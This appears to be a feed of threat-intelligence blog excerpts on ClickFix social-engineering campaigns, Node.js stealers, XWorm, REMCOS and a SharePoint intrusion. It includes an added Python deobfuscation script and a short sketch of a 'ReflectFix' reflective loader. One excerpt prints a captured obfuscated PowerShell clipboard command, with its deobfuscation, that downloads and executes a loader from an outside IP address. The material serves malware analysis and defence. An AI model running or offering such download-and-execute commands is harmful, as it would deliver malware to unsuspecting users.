BSides TC Talk: Click, Paste, Compromise: Unpacking ClickFix
Slides from BSides TC 2025 talk.
Node.js is commonly used to deploy stealers on devices. Often, these incidents involve WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malicious Node.js scripts on the host device. This activity is also referred to as EvilAI (Trend Micro).
The linked article does a great job of breaking these down. They’re essentially .NET assemblies that use WebView2 and AI-generated “web applications” (read: vibe-coded HTML pages). These applications are bundled into an InnoSetup installer together with Node and a malicious script. When the installer runs, it sets up a scheduled task to execute the Node script. The user only sees the intended “legitimate” AI web app get installed.
On Saturday, September 20th, 2025, a user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate-appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occurred between the previous incidents and this current campaign.
I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.
The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to Electron. It combines HTML, CSS, and JavaScript into a single WebView2-based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.
NOTE: Quick and dirty upload of some notes from an XWorm sample.
The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.
The ClickFix domain copied the following code to the user’s clipboard:
POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"
# Deobfuscated
FUNCTION YES {
&$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};
$FF='HSJDUFERIKFOLDJRKMOXSDH';
$DD=$FF[8]+$FF[7]+$FF[17]; #IRM
$SS=$FF[8]+$FF[6]+$FF[19]; #IEX
# IEX (IRM 77.83.207.225/x.jpg)
The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the address 77[.]83[.]207[.]225. Geolocation of this address places it in Moscow, Russia.
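As an added example that is not part of the original notes, the Python script below automates the manual deobfuscation shown above: it collects the `$NAME='...'` string literals, resolves the `$VAR[i]+$VAR[j]` character-index aliases into the cmdlet names they spell, evaluates the `.replace()` string trick, and substitutes the results back into the command so the analyst sees the real call and URL. The sample command is the clipboard payload recorded above; the function names and the `defang` helper are my own and not part of any tool the page mentions.

```python
import re

# Constructed sample: the clipboard command captured above, reproduced verbatim for analysis.
CLIPBOARD_CMD = (
    "POWERSHELL \"FUNCTION YES { &$SS (&$DD "
    "'1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };"
    "$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];"
    "$SS=$FF[8]+$FF[6]+$FF[19]; YES\""
)

STRING_ASSIGN = re.compile(r"\$(\w+)='([^']*)'")                 # $NAME='literal'
INDEX_ASSIGN = re.compile(r"\$(\w+)=((?:\$\w+\[\d+\]\+?)+)")     # $NAME=$SRC[i]+$SRC[j]...
INDEX_REF = re.compile(r"\$(\w+)\[(\d+)\]")                      # one $SRC[i] term
REPLACE_CALL = re.compile(r"'([^']*)'\.replace\('([^']*)','([^']*)'\)")


def string_literals(cmd):
    """Return {name: value} for every $NAME='literal' assignment in the command."""
    return dict(STRING_ASSIGN.findall(cmd))


def index_aliases(cmd, literals):
    """Resolve $NAME=$SRC[i]+$SRC[j]+... into the characters those indices select."""
    aliases = {}
    for name, expr in INDEX_ASSIGN.findall(cmd):
        aliases[name] = "".join(
            literals[src][int(i)] for src, i in INDEX_REF.findall(expr)
        )
    return aliases


def apply_replace_calls(cmd):
    """Evaluate each 'literal'.replace('a','b') expression in place."""
    return REPLACE_CALL.sub(
        lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", cmd
    )


def deobfuscate(cmd):
    """Return (aliases, rewritten command) with aliases and string tricks resolved."""
    literals = string_literals(cmd)
    aliases = index_aliases(cmd, literals)
    out = apply_replace_calls(cmd)
    for name, value in aliases.items():
        # "&$DD" is a call through the alias; swap in the cmdlet name it hides.
        out = out.replace("&$" + name, value)
    return aliases, out


def defang(url):
    """Break the host's dots so the indicator is safe to paste into a report."""
    host, sep, path = url.partition("/")
    return host.replace(".", "[.]") + sep + path


if __name__ == "__main__":
    aliases, clear = deobfuscate(CLIPBOARD_CMD)
    print(aliases)  # {'DD': 'IRM', 'SS': 'IEX'}
    print(clear)
```

The same three passes (literal collection, index resolution, `.replace()` evaluation) cover most of the one-liners this kit produces; anything that survives them is worth a second look by hand.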
A fun thing about WSL 2 is that it is fully capable of calling Windows native functions and binaries. It also has cron, which opens the opportunity to do some interesting things to someone’s unattended device.
Take this MSHTA execution for example. It’s a simple SAPI call made in JavaScript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straightforward way to do this.
Side note: This malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis will reflect the 07/30 analysis date. This is also a really lazy writeup.
The initial incident was observed by Point Wild’s Threat Intelligence team (Report Here).
This report covers the analysis of the sample and attack chain. Check it out, it’s a good write-up. However, from the publicly available reporting at the time of original analysis, there was no information on the injection of SndVol.exe as a method for loading the REMCOS payload.
Note: This doesn’t add much to the reference article, but covers the events as we saw them.
Reference: SharePoint Under Siege
Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to several detections and blocks of encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed the first signs of activity on the affected endpoint occurred on July 17th, at 04:54:50 CDT.
ClickFix has been the hot topic for over a year now (see all the other ClickFix posts) and recently, FileFix has come out as well (Shout out to mr.d0x!). In the spirit of calling every social engineering malware delivery system a “-Fix”, let me introduce you to “ReflectFix”: a reflective .NET loader that utilizes social engineering aspects to load a remote DLL via reflection loading. Much like ClickFix or FileFix, ReflectFix uses a social engineering page that copies a URL to the victim’s clipboard and downloads a reflection-based loader. When executed by the victim, this loader takes the last copied string out of the clipboard and downloads the contents to a byte array which is loaded and executed in memory.
Excerpts from a threat briefing on IRGC threat groups.
Ignore the TLP Amber, this is TLP Green.